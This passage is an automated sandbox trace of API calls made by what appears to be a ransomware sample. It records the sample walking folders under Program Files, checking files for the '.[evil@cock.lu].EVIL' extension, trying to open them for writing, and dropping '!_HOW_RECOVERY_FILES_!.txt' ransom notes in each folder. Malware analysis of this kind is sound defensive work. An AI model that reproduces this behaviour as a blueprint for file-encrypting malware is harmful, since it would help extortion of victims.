_Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 57 [0088.474] wcscmp (_String1=".", _String2="fr-CA") returned -1 [0088.474] wcscmp (_String1="..", _String2="fr-CA") returned -1 [0088.474] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 0x39 [0088.474] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 0x0 [0088.474] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*" [0088.474] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd680 [0088.474] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.474] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\.") returned 59 [0088.474] wcscmp (_String1=".", _String2=".") returned 0 [0088.474] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.474] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.474] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\..") returned 60 [0088.475] wcscmp (_String1=".", _String2="..") returned -1 [0088.475] wcscmp (_String1="..", _String2="..") returned 0 [0088.475] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.475] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.475] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned 73 [0088.475] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.475] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.475] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned 0x49 [0088.475] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.476] GetLastError () returned 0x5 [0088.476] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.476] FindClose (in: hFindFile=0x84b11dd680 | out: hFindFile=0x84b11dd680) returned 1 [0088.476] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 0x39 [0088.476] strlen (_Str="${KEY}") returned 0x6 [0088.476] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.476] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.476] strlen (_Str="${CODE}") returned 0x7 [0088.476] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.476] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.476] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.476] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.476] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.476] __uncaught_exception () returned 0x84b1160800 [0088.476] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.477] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.477] wcsstr (_Str="fr-FR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.477] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 57 [0088.477] wcscmp (_String1=".", _String2="fr-FR") returned -1 [0088.477] wcscmp (_String1="..", _String2="fr-FR") returned -1 [0088.477] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 0x39 [0088.477] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 0x0 [0088.477] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*" [0088.477] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd320 [0088.477] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.477] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\.") returned 59 [0088.477] wcscmp (_String1=".", _String2=".") returned 0 [0088.477] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.477] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.477] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\..") returned 60 [0088.478] wcscmp (_String1=".", _String2="..") returned -1 [0088.478] wcscmp (_String1="..", _String2="..") returned 0 [0088.478] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.478] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.478] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned 73 [0088.478] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.478] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.478] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned 0x49 [0088.478] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.478] GetLastError () returned 0x5 [0088.478] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.478] FindClose (in: hFindFile=0x84b11dd320 | out: hFindFile=0x84b11dd320) returned 1 [0088.478] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 0x39 [0088.478] strlen (_Str="${KEY}") returned 0x6 [0088.478] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.478] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.478] strlen (_Str="${CODE}") returned 0x7 [0088.478] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.478] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.478] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.478] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.479] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.479] __uncaught_exception () returned 0x84b1160800 [0088.479] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.479] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.479] wcsstr (_Str="fsdefinitions", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.479] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 65 [0088.479] wcscmp (_String1=".", _String2="fsdefinitions") returned -1 [0088.479] wcscmp (_String1="..", _String2="fsdefinitions") returned -1 [0088.479] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 0x41 [0088.479] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 0x0 [0088.479] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*" [0088.479] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd560 [0088.519] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.519] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.") returned 67 [0088.519] wcscmp (_String1=".", _String2=".") returned 0 [0088.519] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.519] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.519] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\..") returned 68 [0088.519] wcscmp (_String1=".", _String2="..") returned -1 [0088.520] wcscmp (_String1="..", _String2="..") returned 0 [0088.520] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.520] wcsstr (_Str="auxpad", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.520] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 72 [0088.520] wcscmp (_String1=".", _String2="auxpad") returned -1 [0088.520] wcscmp (_String1="..", _String2="auxpad") returned -1 [0088.520] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 0x48 [0088.520] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 0x0 [0088.520] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*" [0088.520] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11ddc20 [0088.520] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.520] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\.") returned 74 [0088.520] wcscmp (_String1=".", _String2=".") returned 0 [0088.520] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.520] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.520] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\..") returned 75 [0088.520] wcscmp (_String1=".", _String2="..") returned -1 [0088.520] wcscmp (_String1="..", _String2="..") returned 0 [0088.520] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.520] wcsstr (_Str="auxbase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.521] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 84 [0088.521] wcscmp (_String1="auxbase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.521] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="auxbase.xml") returned 0x0 [0088.521] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 0x54 [0088.521] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.521] GetLastError () returned 0x5 [0088.521] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.521] FindClose (in: hFindFile=0x84b11ddc20 | out: hFindFile=0x84b11ddc20) returned 1 [0088.521] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 0x48 [0088.521] strlen (_Str="${KEY}") returned 0x6 [0088.521] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.521] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.521] strlen (_Str="${CODE}") returned 0x7 [0088.521] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.522] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.522] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.522] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.522] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.522] __uncaught_exception () returned 0x84b1160800 [0088.522] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.523] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.523] wcsstr (_Str="auxpad.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.523] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 76 [0088.523] wcscmp (_String1="auxpad.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.523] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="auxpad.xml") returned 0x0 [0088.523] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 0x4c [0088.523] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.524] GetLastError () returned 0x5 [0088.524] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.524] wcsstr (_Str="insert", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.524] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 72 [0088.524] wcscmp (_String1=".", _String2="insert") returned -1 [0088.524] wcscmp (_String1="..", _String2="insert") returned -1 [0088.524] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 0x48 [0088.524] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 0x0 [0088.524] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*" [0088.524] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11dd440 [0088.524] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.524] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\.") returned 74 [0088.524] wcscmp (_String1=".", _String2=".") returned 0 [0088.524] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.524] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.524] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\..") returned 75 [0088.524] wcscmp (_String1=".", _String2="..") returned -1 [0088.524] wcscmp (_String1="..", _String2="..") returned 0 [0088.524] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.524] wcsstr (_Str="insertbase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.524] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 87 [0088.524] wcscmp (_String1="insertbase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.524] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="insertbase.xml") returned 0x0 [0088.524] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 0x57 [0088.524] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.524] GetLastError () returned 0x5 [0088.524] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.524] FindClose (in: hFindFile=0x84b11dd440 | out: hFindFile=0x84b11dd440) returned 1 [0088.525] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 0x48 [0088.525] strlen (_Str="${KEY}") returned 0x6 [0088.525] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.525] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.525] strlen (_Str="${CODE}") returned 0x7 [0088.525] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.525] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.525] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.525] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.525] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.525] __uncaught_exception () returned 0x84b1160800 [0088.525] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.526] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.526] wcsstr (_Str="insert.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.526] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 76 [0088.526] wcscmp (_String1="insert.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.526] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="insert.xml") returned 0x0 [0088.526] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 0x4c [0088.526] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.526] GetLastError () returned 0x5 [0088.526] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.526] wcsstr (_Str="keypad", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.526] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 72 [0088.526] wcscmp (_String1=".", _String2="keypad") returned -1 [0088.526] wcscmp (_String1="..", _String2="keypad") returned -1 [0088.526] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 0x48 [0088.526] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 0x0 [0088.526] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*" [0088.526] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11dd1a0 [0088.526] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.526] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.") returned 74 [0088.526] wcscmp (_String1=".", _String2=".") returned 0 [0088.526] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.526] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.527] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\..") returned 75 [0088.527] wcscmp (_String1=".", _String2="..") returned -1 [0088.527] wcscmp (_String1="..", _String2="..") returned 0 [0088.527] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.527] wcsstr (_Str="ea.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.527] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 79 [0088.527] wcscmp (_String1="ea.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.527] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ea.xml") returned 0x0 [0088.527] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 0x4f [0088.527] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 